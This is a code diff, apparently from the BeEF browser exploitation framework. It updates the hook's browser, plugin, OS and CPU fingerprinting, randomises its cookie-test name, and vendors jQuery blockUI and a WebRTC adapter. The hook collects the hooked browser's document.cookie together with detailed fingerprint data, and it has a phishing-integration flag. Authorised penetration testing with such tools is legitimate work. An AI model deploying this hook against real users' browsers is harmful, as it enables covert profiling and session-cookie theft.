return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC46() || this.isC47()|| this.isC45iOS();
},
/**
@@ -1021,6 +1191,20 @@ beef.browser = {
C38iOS: this.isC38iOS(), // Chrome 38 on iOS
C39: this.isC39(), // Chrome 39
C39iOS: this.isC39iOS(), // Chrome 39 on iOS
C40: this.isC40(), // Chrome 40
C40iOS: this.isC40iOS(), // Chrome 40 on iOS
C41: this.isC41(), // Chrome 41
C41iOS: this.isC41iOS(), // Chrome 41 on iOS
C42: this.isC42(), // Chrome 42
C42iOS: this.isC42iOS(), // Chrome 42 on iOS
C43: this.isC43(), // Chrome 43
C43iOS: this.isC43iOS(), // Chrome 43 on iOS
C44: this.isC44(), // Chrome 44
C44iOS: this.isC44iOS(), // Chrome 44 on iOS
C45: this.isC45(), // Chrome 45
C46: this.isC46(), // Chrome 46
C47: this.isC47(), // Chrome 46
C45iOS: this.isC45iOS(), // Chrome 45 on iOS
C: this.isC(), // Chrome any version
@@ -1060,6 +1244,14 @@ beef.browser = {
FF33: this.isFF33(), // Firefox 33
FF34: this.isFF34(), // Firefox 34
FF35: this.isFF35(), // Firefox 35
FF36: this.isFF36(), // Firefox 36
FF37: this.isFF37(), // Firefox 37
FF38: this.isFF38(), // Firefox 38
FF39: this.isFF39(), // Firefox 39
FF40: this.isFF40(), // Firefox 40
FF41: this.isFF41(), // Firefox 41
FF42: this.isFF42(), // Firefox 42
FF43: this.isFF43(), // Firefox 43
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -1318,6 +1510,62 @@ beef.browser = {
return '39'
}
; // Chrome 39 for iOS
if (this.isC40()) {
return '40'
}
; // Chrome 40
if (this.isC40iOS()) {
return '40'
}
; // Chrome 40 for iOS
if (this.isC41()) {
return '41'
}
; // Chrome 41
if (this.isC41iOS()) {
return '41'
}
; // Chrome 41 for iOS
if (this.isC42()) {
return '42'
}
; // Chrome 42
if (this.isC42iOS()) {
return '42'
}
; // Chrome 42 for iOS
if (this.isC43()) {
return '43'
}
; // Chrome 43
if (this.isC43iOS()) {
return '43'
}
; // Chrome 43 for iOS
if (this.isC44()) {
return '44'
}
; // Chrome 44
if (this.isC44iOS()) {
return '44'
}
; // Chrome 44 for iOS
if (this.isC45()) {
return '45'
}
; // Chrome 45
if (this.isC46()) {
return '46'
}
;// Chrome 46
if (this.isC47()) {
return '47'
}
;// Chrome 47
if (this.isC45iOS()) {
return '45'
}
; // Chrome 45 for iOS
if (this.isFF2()) {
return '2'
@@ -1463,6 +1711,38 @@ beef.browser = {
return '35'
}
; // Firefox 35
if (this.isFF36()) {
return '36'
}
; // Firefox 36
if (this.isFF37()) {
return '37'
}
; // Firefox 37
if (this.isFF38()) {
return '38'
}
; // Firefox 38
if (this.isFF39()) {
return '39'
}
; // Firefox 39
if (this.isFF40()) {
return '40'
}
; // Firefox 40
if (this.isFF41()) {
return '41'
}
; // Firefox 41
if (this.isFF42()) {
return '42'
}
; // Firefox 42
if (this.isFF43()) {
return '43'
}
; // Firefox 43
if (this.isIE6()) {
return '6'
@@ -1603,17 +1883,21 @@ beef.browser = {
flash_versions = 12;
flash_installed = false;
if (window.ActiveXObject) {
for (x = 2; x <= flash_versions; x++) {
try {
Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
if (Flash) {
flash_installed = true;
if (this.type().IE11) {
flash_installed = (navigator.plugins["Shockwave Flash"] != undefined);
} else {
if (window.ActiveXObject != null) {
for (x = 2; x <= flash_versions; x++) {
try {
Flash = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + x + "');");
if (Flash) {
flash_installed = true;
}
} catch (e) {
beef.debug("Creating Flash ActiveX object failed: " + e.message);
}
}
catch (e) {
beef.debug("Creating Flash ActiveX object failed: " + e.message);
}
}
}
return flash_installed;
@@ -1784,13 +2068,8 @@ beef.browser = {
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function () {
//Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
// versionJRE = deployJava.getJREs();
// if(versionJRE != '')
// return true;
// else
return false;
return navigator.javaEnabled();
},
@@ -1834,9 +2113,11 @@ beef.browser = {
* @example: if(beef.browser.hasJava()) { ... }
*/
hasJava: function () {
return beef.browser.javaEnabled();
if (beef.browser.getPlugins().match(/java/i) && beef.browser.javaEnabled()) {
return true;
} else {
return false;
}
},
/**
@@ -1988,16 +2269,6 @@ beef.browser = {
catch (e) {
}
}},
'Silverlight_Plug-In': {
'control': 'Silverlight Plug-In',
'return': function (control) {
try {
version = navigator.plugins['Silverlight Plug-In']["description"];
return 'Silverlight Plug-In Version ' + version;//+ " description "+ filename;
}
catch (e) {
}
}},
'FoxitReader_Plugin': {
'control': 'FoxitReader Plugin',
'return': function (control) {
@@ -2167,6 +2438,7 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
var os_version = beef.os.getVersion();
var default_browser = beef.os.getDefaultBrowser();
var hw_name = beef.hardware.getName();
var cpu_type = beef.hardware.cpuType();
@@ -2184,15 +2456,14 @@ beef.browser = {
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
try {
var cookies = document.cookie;
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
var veglol = beef.browser.cookie.veganLol();
var has_session_cookies = (beef.browser.cookie.hasSessionCookies(veglol)) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies(veglol)) ? "Yes" : "No";
if (cookies) details['Cookies'] = cookies;
if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
@@ -2215,6 +2486,7 @@ beef.browser = {
if (hostport) details['HostPort'] = hostport;
if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
if (os_name) details['OsName'] = os_name;
if (os_version) details['OsVersion'] = os_version;
if (default_browser) details['DefaultBrowser'] = default_browser;
if (hw_name) details['Hardware'] = hw_name;
if (cpu_type) details['CPU'] = cpu_type;
@@ -2231,11 +2503,9 @@ beef.browser = {
if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
if (has_webrtc) details['HasWebRTC'] = has_webrtc;
if (has_activex) details['HasActiveX'] = has_activex;
if (has_silverlight) details['HasSilverlight'] = has_silverlight;
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
if (has_wmp) details['HasWMP'] = has_wmp;
if (has_foxit) details['HasFoxit'] = has_foxit;
var pf_integration = "<%= @phishing_frenzy_enable %>";
if (pf_integration) {

41
core/main/client/browser/cookie.js
View File

@@ -71,12 +71,36 @@ beef.browser.cookie = {
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
veganLol: function (){
var to_hell= '';
var min = 17;
var max = 25;
var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
var grunt = function(){
var moo = Math.floor(Math.random() * 62);
var char = '';
if(moo < 36){
char = String.fromCharCode(moo + 55);
}else{
char = String.fromCharCode(moo + 61);
}
if(char != ';' && char != '='){
return char;
}else{
return 'x';
}
};
while(to_hell.length < lol_length){
to_hell += grunt();
}
return to_hell;
},
hasSessionCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', '', '/', '', '' );
hasSessionCookies: function (name){
this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
@@ -84,11 +108,8 @@ beef.browser.cookie = {
},
hasPersistentCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', 1, '/', '', '' );
hasPersistentCookies: function (name){
this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');

36
core/main/client/hardware.js
View File

@@ -12,21 +12,29 @@ beef.hardware = {
* @return: {String} CPU type
**/
cpuType: function() {
// IE
if (typeof navigator.cpuClass != 'undefined') {
cpu = navigator.cpuClass;
if (cpu == "x86") return "32-bit";
if (cpu == "68K") return "Motorola 68K";
if (cpu == "PPC") return "Motorola PPC";
if (cpu == "Alpha") return "Digital";
if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
// Firefox
} else if (typeof navigator.oscpu != 'undefined') {
if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
var arch = 'UNKNOWN';
// note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
// in detecting the OS arch rather than the browser build
if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
arch = 'x86_64';
}else if(typeof navigator.cpuClass != 'undefined'){
switch (navigator.cpuClass) {
case '68K':
arch = 'Motorola 68K';
break;
case 'PPC':
arch = 'Motorola PPC';
break;
case 'Digital':
arch = 'Alpha';
break;
default:
arch = 'x86';
}
}
if (navigator.platform.toLowerCase() == "win64") return "64-bit";
return "32-bit";
// TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
// For example, if OSX is at least 10.7, most certainly is 64 bit.
return arch;
},
/*

2
core/main/client/init.js
View File

@@ -69,13 +69,11 @@ function beef_init() {
beef.net.browser_details();
beef.updater.execute_commands();
beef.logger.start();
beef.are.init();
}else {
beef.net.browser_details();
beef.updater.execute_commands();
beef.updater.check();
beef.logger.start();
beef.are.init();
}
}
}

12
core/main/client/lib/deployJava.js
View File

@@ -70,16 +70,10 @@ var deployJava = function() {
hattrs.events);
var applet_valid_attrs = hattrs.applet.concat(hattrs.core);
// generic log function, use console.log unless it isn't available
// then revert to alert()
// generic log function
function log(message) {
if ( ! rv.debug ) {return};
if (console.log) {
console.log(message);
} else {
alert(message);
}
beef.debug(message);
}
//checks where given version string matches query
@@ -1298,4 +1292,4 @@ var deployJava = function() {
}
return rv;
}();
}();

620
core/main/client/lib/jquery.blockUI.js Normal file
View File

@@ -0,0 +1,620 @@
/*!
* jQuery blockUI plugin
* Version 2.70.0-2014.11.23
* Requires jQuery v1.7 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2013 M. Alsup
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
* Thanks to Amir-Hossein Sobhi for some excellent contributions!
*/
;(function() {
/*jshint eqeqeq:false curly:false latedef:false */
"use strict";
function setup($) {
$.fn._fadeIn = $.fn.fadeIn;
var noOp = $.noop || function() {};
// this bit is to ensure we don't call setExpression when we shouldn't (with extra muscle to handle
// confusing userAgent strings on Vista)
var msie = /MSIE/.test(navigator.userAgent);
var ie6 = /MSIE 6.0/.test(navigator.userAgent) && ! /MSIE 8.0/.test(navigator.userAgent);
var mode = document.documentMode || 0;
var setExpr = $.isFunction( document.createElement('div').style.setExpression );
// global $ methods for blocking/unblocking the entire page
$.blockUI = function(opts) { install(window, opts); };
$.unblockUI = function(opts) { remove(window, opts); };
// convenience method for quick growl-like notifications (http://www.google.com/search?q=growl)
$.growlUI = function(title, message, timeout, onClose) {
var $m = $('<div class="growlUI"></div>');
if (title) $m.append('<h1>'+title+'</h1>');
if (message) $m.append('<h2>'+message+'</h2>');
if (timeout === undefined) timeout = 3000;
// Added by konapun: Set timeout to 30 seconds if this growl is moused over, like normal toast notifications
var callBlock = function(opts) {
opts = opts || {};
$.blockUI({
message: $m,
fadeIn : typeof opts.fadeIn !== 'undefined' ? opts.fadeIn : 700,
fadeOut: typeof opts.fadeOut !== 'undefined' ? opts.fadeOut : 1000,
timeout: typeof opts.timeout !== 'undefined' ? opts.timeout : timeout,
centerY: false,
showOverlay: false,
onUnblock: onClose,
css: $.blockUI.defaults.growlCSS
});
};
callBlock();
var nonmousedOpacity = $m.css('opacity');
$m.mouseover(function() {
callBlock({
fadeIn: 0,
timeout: 30000
});
var displayBlock = $('.blockMsg');
displayBlock.stop(); // cancel fadeout if it has started
displayBlock.fadeTo(300, 1); // make it easier to read the message by removing transparency
}).mouseout(function() {
$('.blockMsg').fadeOut(1000);
});
// End konapun additions
};
// plugin method for blocking element content
$.fn.block = function(opts) {
if ( this[0] === window ) {
$.blockUI( opts );
return this;
}
var fullOpts = $.extend({}, $.blockUI.defaults, opts || {});
this.each(function() {
var $el = $(this);
if (fullOpts.ignoreIfBlocked && $el.data('blockUI.isBlocked'))
return;
$el.unblock({ fadeOut: 0 });
});
return this.each(function() {
if ($.css(this,'position') == 'static') {
this.style.position = 'relative';
$(this).data('blockUI.static', true);
}
this.style.zoom = 1; // force 'hasLayout' in ie
install(this, opts);
});
};
// plugin method for unblocking element content
$.fn.unblock = function(opts) {
if ( this[0] === window ) {
$.unblockUI( opts );
return this;
}
return this.each(function() {
remove(this, opts);
});
};
$.blockUI.version = 2.70; // 2nd generation blocking at no extra cost!
// override these in your code to change the default behavior and style
$.blockUI.defaults = {
// message displayed when blocking (use null for no message)
message: '<h1>Please wait...</h1>',
title: null, // title string; only used when theme == true
draggable: true, // only used when theme == true (requires jquery-ui.js to be loaded)
theme: false, // set to true to use with jQuery UI themes
// styles for the message when blocking; if you wish to disable
// these and use an external stylesheet then do this in your code:
// $.blockUI.defaults.css = {};
css: {
padding: 0,
margin: 0,
width: '30%',
top: '40%',
left: '35%',
textAlign: 'center',
color: '#000',
border: '3px solid #aaa',
backgroundColor:'#fff',
cursor: 'wait'
},
// minimal style set used when themes are used
themedCSS: {
width: '30%',
top: '40%',
left: '35%'
},
// styles for the overlay
overlayCSS: {
backgroundColor: '#000',
opacity: 0.6,
cursor: 'wait'
},
// style to replace wait cursor before unblocking to correct issue
// of lingering wait cursor
cursorReset: 'default',
// styles applied when using $.growlUI
growlCSS: {
width: '350px',
top: '10px',
left: '',
right: '10px',
border: 'none',
padding: '5px',
opacity: 0.6,
cursor: 'default',
color: '#fff',
backgroundColor: '#000',
'-webkit-border-radius':'10px',
'-moz-border-radius': '10px',
'border-radius': '10px'
},
// IE issues: 'about:blank' fails on HTTPS and javascript:false is s-l-o-w
// (hat tip to Jorge H. N. de Vasconcelos)
/*jshint scripturl:true */
iframeSrc: /^https/i.test(window.location.href || '') ? 'javascript:false' : 'about:blank',
// force usage of iframe in non-IE browsers (handy for blocking applets)
forceIframe: false,
// z-index for the blocking overlay
baseZ: 1000,
// set these to true to have the message automatically centered
centerX: true, // <-- only effects element blocking (page block controlled via css above)
centerY: true,
// allow body element to be stetched in ie6; this makes blocking look better
// on "short" pages. disable if you wish to prevent changes to the body height
allowBodyStretch: true,
// enable if you want key and mouse events to be disabled for content that is blocked
bindEvents: true,
// be default blockUI will supress tab navigation from leaving blocking content
// (if bindEvents is true)
constrainTabKey: true,
// fadeIn time in millis; set to 0 to disable fadeIn on block
fadeIn: 200,
// fadeOut time in millis; set to 0 to disable fadeOut on unblock
fadeOut: 400,
// time in millis to wait before auto-unblocking; set to 0 to disable auto-unblock
timeout: 0,
// disable if you don't want to show the overlay
showOverlay: true,
// if true, focus will be placed in the first available input field when
// page blocking
focusInput: true,
// elements that can receive focus
focusableElements: ':input:enabled:visible',
// suppresses the use of overlay styles on FF/Linux (due to performance issues with opacity)
// no longer needed in 2012
// applyPlatformOpacityRules: true,
// callback method invoked when fadeIn has completed and blocking message is visible
onBlock: null,
// callback method invoked when unblocking has completed; the callback is
// passed the element that has been unblocked (which is the window object for page
// blocks) and the options that were passed to the unblock call:
// onUnblock(element, options)
onUnblock: null,
// callback method invoked when the overlay area is clicked.
// setting this will turn the cursor to a pointer, otherwise cursor defined in overlayCss will be used.
onOverlayClick: null,
// don't ask; if you really must know: http://groups.google.com/group/jquery-en/browse_thread/thread/36640a8730503595/2f6a79a77a78e493#2f6a79a77a78e493
quirksmodeOffsetHack: 4,
// class name of the message block
blockMsgClass: 'blockMsg',
// if it is already blocked, then ignore it (don't unblock and reblock)
ignoreIfBlocked: false
};
// private data and functions follow...
var pageBlock = null;
var pageBlockEls = [];
function install(el, opts) {
var css, themedCSS;
var full = (el == window);
var msg = (opts && opts.message !== undefined ? opts.message : undefined);
opts = $.extend({}, $.blockUI.defaults, opts || {});
if (opts.ignoreIfBlocked && $(el).data('blockUI.isBlocked'))
return;
opts.overlayCSS = $.extend({}, $.blockUI.defaults.overlayCSS, opts.overlayCSS || {});
css = $.extend({}, $.blockUI.defaults.css, opts.css || {});
if (opts.onOverlayClick)
opts.overlayCSS.cursor = 'pointer';
themedCSS = $.extend({}, $.blockUI.defaults.themedCSS, opts.themedCSS || {});
msg = msg === undefined ? opts.message : msg;
// remove the current block (if there is one)
if (full && pageBlock)
remove(window, {fadeOut:0});
// if an existing element is being used as the blocking content then we capture
// its current place in the DOM (and current display style) so we can restore
// it when we unblock
if (msg && typeof msg != 'string' && (msg.parentNode || msg.jquery)) {
var node = msg.jquery ? msg[0] : msg;
var data = {};
$(el).data('blockUI.history', data);
data.el = node;
data.parent = node.parentNode;
data.display = node.style.display;
data.position = node.style.position;
if (data.parent)
data.parent.removeChild(node);
}
$(el).data('blockUI.onUnblock', opts.onUnblock);
var z = opts.baseZ;
// blockUI uses 3 layers for blocking, for simplicity they are all used on every platform;
// layer1 is the iframe layer which is used to supress bleed through of underlying content
// layer2 is the overlay layer which has opacity and a wait cursor (by default)
// layer3 is the message content that is displayed while blocking
var lyr1, lyr2, lyr3, s;
if (msie || opts.forceIframe)
lyr1 = $('<iframe class="blockUI" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0" src="'+opts.iframeSrc+'"></iframe>');
else
lyr1 = $('<div class="blockUI" style="display:none"></div>');
if (opts.theme)
lyr2 = $('<div class="blockUI blockOverlay ui-widget-overlay" style="z-index:'+ (z++) +';display:none"></div>');
else
lyr2 = $('<div class="blockUI blockOverlay" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;width:100%;height:100%;top:0;left:0"></div>');
if (opts.theme && full) {
s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:fixed">';
if ( opts.title ) {
s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
}
s += '<div class="ui-widget-content ui-dialog-content"></div>';
s += '</div>';
}
else if (opts.theme) {
s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:absolute">';
if ( opts.title ) {
s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
}
s += '<div class="ui-widget-content ui-dialog-content"></div>';
s += '</div>';
}
else if (full) {
s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage" style="z-index:'+(z+10)+';display:none;position:fixed"></div>';
}
else {
s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement" style="z-index:'+(z+10)+';display:none;position:absolute"></div>';
}
lyr3 = $(s);
// if we have a message, style it
if (msg) {
if (opts.theme) {
lyr3.css(themedCSS);
lyr3.addClass('ui-widget-content');
}
else
lyr3.css(css);
}
// style the overlay
if (!opts.theme /*&& (!opts.applyPlatformOpacityRules)*/)
lyr2.css(opts.overlayCSS);
lyr2.css('position', full ? 'fixed' : 'absolute');
// make iframe layer transparent in IE
if (msie || opts.forceIframe)
lyr1.css('opacity',0.0);
//$([lyr1[0],lyr2[0],lyr3[0]]).appendTo(full ? 'body' : el);
var layers = [lyr1,lyr2,lyr3], $par = full ? $('body') : $(el);
$.each(layers, function() {
this.appendTo($par);
});
if (opts.theme && opts.draggable && $.fn.draggable) {
lyr3.draggable({
handle: '.ui-dialog-titlebar',
cancel: 'li'
});
}
// ie7 must use absolute positioning in quirks mode and to account for activex issues (when scrolling)
var expr = setExpr && (!$.support.boxModel || $('object,embed', full ? null : el).length > 0);
if (ie6 || expr) {
// give body 100% height
if (full && opts.allowBodyStretch && $.support.boxModel)
$('html,body').css('height','100%');
// fix ie6 issue when blocked element has a border width
if ((ie6 || !$.support.boxModel) && !full) {
var t = sz(el,'borderTopWidth'), l = sz(el,'borderLeftWidth');
var fixT = t ? '(0 - '+t+')' : 0;
var fixL = l ? '(0 - '+l+')' : 0;
}
// simulate fixed position
$.each(layers, function(i,o) {
var s = o[0].style;
s.position = 'absolute';
if (i < 2) {
if (full)
s.setExpression('height','Math.max(document.body.scrollHeight, document.body.offsetHeight) - (jQuery.support.boxModel?0:'+opts.quirksmodeOffsetHack+') + "px"');
else
s.setExpression('height','this.parentNode.offsetHeight + "px"');
if (full)
s.setExpression('width','jQuery.support.boxModel && document.documentElement.clientWidth || document.body.clientWidth + "px"');
else
s.setExpression('width','this.parentNode.offsetWidth + "px"');
if (fixL) s.setExpression('left', fixL);
if (fixT) s.setExpression('top', fixT);
}
else if (opts.centerY) {
if (full) s.setExpression('top','(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"');
s.marginTop = 0;
}
else if (!opts.centerY && full) {
var top = (opts.css && opts.css.top) ? parseInt(opts.css.top, 10) : 0;
var expression = '((document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + '+top+') + "px"';
s.setExpression('top',expression);
}
});
}
// show the message
if (msg) {
if (opts.theme)
lyr3.find('.ui-widget-content').append(msg);
else
lyr3.append(msg);
if (msg.jquery || msg.nodeType)
$(msg).show();
}
if ((msie || opts.forceIframe) && opts.showOverlay)
lyr1.show(); // opacity is zero
if (opts.fadeIn) {
var cb = opts.onBlock ? opts.onBlock : noOp;
var cb1 = (opts.showOverlay && !msg) ? cb : noOp;
var cb2 = msg ? cb : noOp;
if (opts.showOverlay)
lyr2._fadeIn(opts.fadeIn, cb1);
if (msg)
lyr3._fadeIn(opts.fadeIn, cb2);
}
else {
if (opts.showOverlay)
lyr2.show();
if (msg)
lyr3.show();
if (opts.onBlock)
opts.onBlock.bind(lyr3)();
}
// bind key and mouse events
bind(1, el, opts);
if (full) {
pageBlock = lyr3[0];
pageBlockEls = $(opts.focusableElements,pageBlock);
if (opts.focusInput)
setTimeout(focus, 20);
}
else
center(lyr3[0], opts.centerX, opts.centerY);
if (opts.timeout) {
// auto-unblock
var to = setTimeout(function() {
if (full)
$.unblockUI(opts);
else
$(el).unblock(opts);
}, opts.timeout);
$(el).data('blockUI.timeout', to);
}
}
// remove the block
function remove(el, opts) {
var count;
var full = (el == window);
var $el = $(el);
var data = $el.data('blockUI.history');
var to = $el.data('blockUI.timeout');
if (to) {
clearTimeout(to);
$el.removeData('blockUI.timeout');
}
opts = $.extend({}, $.blockUI.defaults, opts || {});
bind(0, el, opts); // unbind events
if (opts.onUnblock === null) {
opts.onUnblock = $el.data('blockUI.onUnblock');
$el.removeData('blockUI.onUnblock');
}
var els;
if (full) // crazy selector to handle odd field errors in ie6/7
els = $('body').children().filter('.blockUI').add('body > .blockUI');
else
els = $el.find('>.blockUI');
// fix cursor issue
if ( opts.cursorReset ) {
if ( els.length > 1 )
els[1].style.cursor = opts.cursorReset;
if ( els.length > 2 )
els[2].style.cursor = opts.cursorReset;
}
if (full)
pageBlock = pageBlockEls = null;
if (opts.fadeOut) {
count = els.length;
els.stop().fadeOut(opts.fadeOut, function() {
if ( --count === 0)
reset(els,data,opts,el);
});
}
else
reset(els, data, opts, el);
}
// move blocking element back into the DOM where it started
function reset(els,data,opts,el) {
var $el = $(el);
if ( $el.data('blockUI.isBlocked') )
return;
els.each(function(i,o) {
// remove via DOM calls so we don't lose event handlers
if (this.parentNode)
this.parentNode.removeChild(this);
});
if (data && data.el) {
data.el.style.display = data.display;
data.el.style.position = data.position;
data.el.style.cursor = 'default'; // #59
if (data.parent)
data.parent.appendChild(data.el);
$el.removeData('blockUI.history');
}
if ($el.data('blockUI.static')) {
$el.css('position', 'static'); // #22
}
if (typeof opts.onUnblock == 'function')
opts.onUnblock(el,opts);
// fix issue in Safari 6 where block artifacts remain until reflow
var body = $(document.body), w = body.width(), cssW = body[0].style.width;
body.width(w-1).width(w);
body[0].style.width = cssW;
}
// bind/unbind the handler
function bind(b, el, opts) {
var full = el == window, $el = $(el);
// don't bother unbinding if there is nothing to unbind
if (!b && (full && !pageBlock || !full && !$el.data('blockUI.isBlocked')))
return;
$el.data('blockUI.isBlocked', b);
// don't bind events when overlay is not in use or if bindEvents is false
if (!full || !opts.bindEvents || (b && !opts.showOverlay))
return;
// bind anchors and inputs for mouse and key events
var events = 'mousedown mouseup keydown keypress keyup touchstart touchend touchmove';
if (b)
$(document).bind(events, opts, handler);
else
$(document).unbind(events, handler);
// former impl...
// var $e = $('a,:input');
// b ? $e.bind(events, opts, handler) : $e.unbind(events, handler);
}
// event handler to suppress keyboard/mouse events when blocking
function handler(e) {
// allow tab navigation (conditionally)
if (e.type === 'keydown' && e.keyCode && e.keyCode == 9) {
if (pageBlock && e.data.constrainTabKey) {
var els = pageBlockEls;
var fwd = !e.shiftKey && e.target === els[els.length-1];
var back = e.shiftKey && e.target === els[0];
if (fwd || back) {
setTimeout(function(){focus(back);},10);
return false;
}
}
}
var opts = e.data;
var target = $(e.target);
if (target.hasClass('blockOverlay') && opts.onOverlayClick)
opts.onOverlayClick(e);
// allow events within the message content
if (target.parents('div.' + opts.blockMsgClass).length > 0)
return true;
// allow events for content that is not being blocked
return target.parents().children().filter('div.blockUI').length === 0;
}
function focus(back) {
if (!pageBlockEls)
return;
var e = pageBlockEls[back===true ? pageBlockEls.length-1 : 0];
if (e)
e.focus();
}
function center(el, x, y) {
var p = el.parentNode, s = el.style;
var l = ((p.offsetWidth - el.offsetWidth)/2) - sz(p,'borderLeftWidth');
var t = ((p.offsetHeight - el.offsetHeight)/2) - sz(p,'borderTopWidth');
if (x) s.left = l > 0 ? (l+'px') : '0';
if (y) s.top = t > 0 ? (t+'px') : '0';
}
function sz(el, p) {
return parseInt($.css(el,p),10)||0;
}
}
/*global define:true */
if (typeof define === 'function' && define.amd && define.amd.jQuery) {
define(['jquery'], setup);
} else {
setup(jQuery);
}
})();

4
core/main/client/lib/mdetect.js
View File

@@ -703,4 +703,6 @@ function InitDeviceScan()
isTierGenericMobile = DetectTierOtherPhones();
};
InitDeviceScan()
try {
InitDeviceScan();
}catch(e){}

499
core/main/client/lib/webrtcadapter.js
View File

@@ -1,200 +1,409 @@
var RTCPeerConnection = null;
/*
* Copyright (c) 2014 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree.
*/
/* More information about these options at jshint.com/docs/options */
/* jshint browser: true, camelcase: true, curly: true, devel: true,
eqeqeq: true, forin: false, globalstrict: true, node: true,
quotmark: single, undef: true, unused: strict */
/* global mozRTCIceCandidate, mozRTCPeerConnection, Promise,
mozRTCSessionDescription, webkitRTCPeerConnection, MediaStreamTrack */
/* exported trace,requestUserMedia */
'use strict';
var getUserMedia = null;
var attachMediaStream = null;
